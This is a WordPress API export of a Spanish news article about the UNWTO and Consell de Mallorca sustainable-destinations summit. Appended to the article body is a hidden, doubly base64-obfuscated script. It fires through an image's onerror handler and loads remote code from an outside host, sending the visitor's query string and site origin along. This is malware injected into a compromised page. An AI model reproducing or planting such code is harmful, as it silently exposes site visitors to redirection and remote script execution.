{"id":6618,"date":"2023-04-11T10:17:12","date_gmt":"2023-04-11T13:17:12","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6618"},"modified":"2025-08-13T16:02:17","modified_gmt":"2025-08-13T19:02:17","slug":"el-consell-de-mallorca-la-fundacion-mallorca-turismo-y-la-omt-han-acogido-la-segunda-edicion-de-la-cumbre-de-destinos-sostenibles","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6618","title":{"rendered":"<em>El Consell de Mallorca, la Fundaci\u00f3n Mallorca Turismo y la OMT han acogido la segunda edici\u00f3n de la Cumbre de Destinos Sostenibles<\/em>"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#073753\"><em>La cumbre ha reunido a destacados expertos, organizaciones y empresas para compartir las mejores pr\u00e1cticas y perspectivas sobre la sostenibilidad ambiental, social y econ\u00f3mica de los destinos.<\/em><\/h3>\n\n\n\n<p>La Cumbre hizo hincapi\u00e9 en el turismo como fuerza para impulsar el progreso y catapultar un futuro regenerativo y positivo para la naturaleza. Este a\u00f1o, la OMT y el Consell de Mallorca dieron la bienvenida a m\u00e1s de 400 delegados que asistieron a este evento en el que se presentaron los \u00faltimos avances en materia sostenibilidad para los destinos. En los debates se pusieron de relieve la interdependencia entre el turismo y los recursos naturales y culturales y los posibles beneficios mutuos, al tiempo que se ofrecieron perspectivas singulares de primera mano, como la del jefe Frank Antoine, de la Primera Naci\u00f3n Bonaparte, o la visi\u00f3n desde el espacio exterior, contada por Pedro Duque, el primer astronauta espa\u00f1ol de la historia.<\/p>\n\n\n\n<p>La presidenta del Consell de Mallorca, Catalina Cladera, afirm\u00f3 que \u00abla sostenibilidad es una ambici\u00f3n compartida de la sociedad mallorquina y el eje que marca todas las pol\u00edticas del Consell\u00bb. Cladera se\u00f1al\u00f3 que Mallorca y el resto de las islas de esta comunidad \u00abest\u00e1n dando pasos firmes no solo para seguir siendo el destino de referencia en el Mediterr\u00e1neo, sino tambi\u00e9n para liderar el turismo del futuro\u00bb.<\/p>\n\n\n\n<p>En su discurso de apertura, la directora ejecutiva de la OMT, Zoritsa Urosevic, hizo hincapi\u00e9 en la vital \u00abtransici\u00f3n del sector hacia una fuerza de progreso que tenga un impacto positivo en la Agenda de Desarrollo Sostenible y en nuestros retos globales compartidos\u00bb. Y a\u00f1adi\u00f3: \u00abSi se gestiona bien, el turismo puede ser un agente de cambio, pero esa transici\u00f3n tan necesaria hacia un sector tur\u00edstico verde, regenerativo y positivo para la naturaleza solo puede lograrse de forma colaborativa\u00bb.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Grandes ambiciones y&nbsp;<em>big data<\/em><\/h2>\n\n\n\n<p>Durante los dos d\u00edas de la Cumbre, la OMT comparti\u00f3 las \u00faltimas novedades respecto a algunas de sus actividades m\u00e1s importantes en relaci\u00f3n con la sostenibilidad, entre ellas la&nbsp;<a href=\"https:\/\/www.unwto.org\/es\/declaracion-de-glasgow-sobre-la-accion-climatica-en-el-turismo\">Declaraci\u00f3n de Glasgow sobre la Acci\u00f3n Clim\u00e1tica en el Turismo<\/a>, que, hasta la fecha, ha logrado que m\u00e1s de 800 empresas, destinos y gobiernos se comprometan a alcanzar el cero neto de emisiones en el sector tur\u00edstico de aqu\u00ed a 2050. De igual modo, se subray\u00f3 la importancia de la Iniciativa Mundial sobre Turismo y Pl\u00e1sticos y del programa relativo al desperdicio de alimentos como instrumentos eficaces para acelerar la transici\u00f3n.<\/p>\n\n\n\n<p>La OMT tambi\u00e9n situ\u00f3 en el eje de la conversaci\u00f3n de la Cumbre los datos tur\u00edsticos y la gesti\u00f3n de destinos. El marco de Medici\u00f3n de la Sostenibilidad del Turismo (MST) y la&nbsp;<a href=\"https:\/\/www.unwto.org\/sustainable-development\/unwto-international-network-of-sustainable-tourism-observatories\">Red Internacional de Observatorios de Turismo Sostenible<\/a>, que cuenta entre sus miembros al observatorio de Mallorca, tendr\u00e1n un papel crucial en el seguimiento del impacto del sector en los tres pilares de la sostenibilidad, posibilitando la toma de decisiones informadas y con base emp\u00edrica.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Importancia del sector privado<\/h2>\n\n\n\n<p>El Consell de Mallorca, a trav\u00e9s de su Fundaci\u00f3n de Turismo Mallorca y del Observatorio de Turismo Sostenible, ha establecido una red de cooperaci\u00f3n p\u00fablico-privada en toda la isla y colabora estrechamente con la OMT para avanzar en los objetivos compartidos.<\/p>\n\n\n\n<p>En representaci\u00f3n del sector privado, Mar\u00eda Frontera, presidenta de la FEHM (Federaci\u00f3n Hotelera de Mallorca), se uni\u00f3 a Carmen Riu G\u00fcell, propietaria de la cadena RIU Hotels &amp; Resorts, para debatir sobre el acercamiento de perspectivas generacionales en la b\u00fasqueda del desarrollo del turismo sostenible. El evento tambi\u00e9n hizo hincapi\u00e9 en la importancia de la colaboraci\u00f3n y la circularidad en la transformaci\u00f3n del sector. Adem\u00e1s, Andreu Serra, Consejero de Transici\u00f3n, Turismo y Deportes de Mallorca, la presidenta de la FEHM, Mar\u00eda Frontera, Mark Tanzer, director ejecutivo de ABTA, Miguel Sanz, director general de Turespa\u00f1a, y Thomas Ellerbeck, miembro del Consejo Ejecutivo del Grupo y director de Sostenibilidad de TUI Group debatieron sobre c\u00f3mo aquellos destinos comprometidos con la sostenibilidad pueden encontrar un equilibrio entre el marketing y la narraci\u00f3n de historias.<\/p>\n\n\n\n<p>En la clausura de la Cumbre, Rosa Ana Morillo Rodr\u00edguez, secretaria de Estado de Turismo de Espa\u00f1a, destac\u00f3 el papel crucial de la sostenibilidad para el pa\u00eds. Reconoci\u00f3 que el turismo es uno de los sectores clave que impulsan la econom\u00eda espa\u00f1ola y subray\u00f3 la necesidad de garantizar la resiliencia y competitividad dentro del sector\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.unwto.org\/es\/news\/cumbre-de-destinos-sostenibles-liderando-la-transformacion\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"89\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg\" alt=\"\" class=\"wp-image-4508\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1024x89.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-300x26.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-768x67.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1536x133.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-696x60.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias-1068x93.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/07\/omt-Noticias.jpg 1568w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La cumbre ha reunido a destacados expertos, organizaciones y empresas para compartir las mejores pr\u00e1cticas y perspectivas sobre la sostenibilidad ambiental, social y econ\u00f3mica de los destinos. La Cumbre hizo hincapi\u00e9 en el turismo como fuerza para impulsar el progreso y catapultar un futuro regenerativo y positivo para la naturaleza. Este a\u00f1o, la OMT y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6619,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-6618","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6618","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6618"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6618\/revisions"}],"predecessor-version":[{"id":10430,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6618\/revisions\/10430"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6619"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6618"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6618"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6618"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}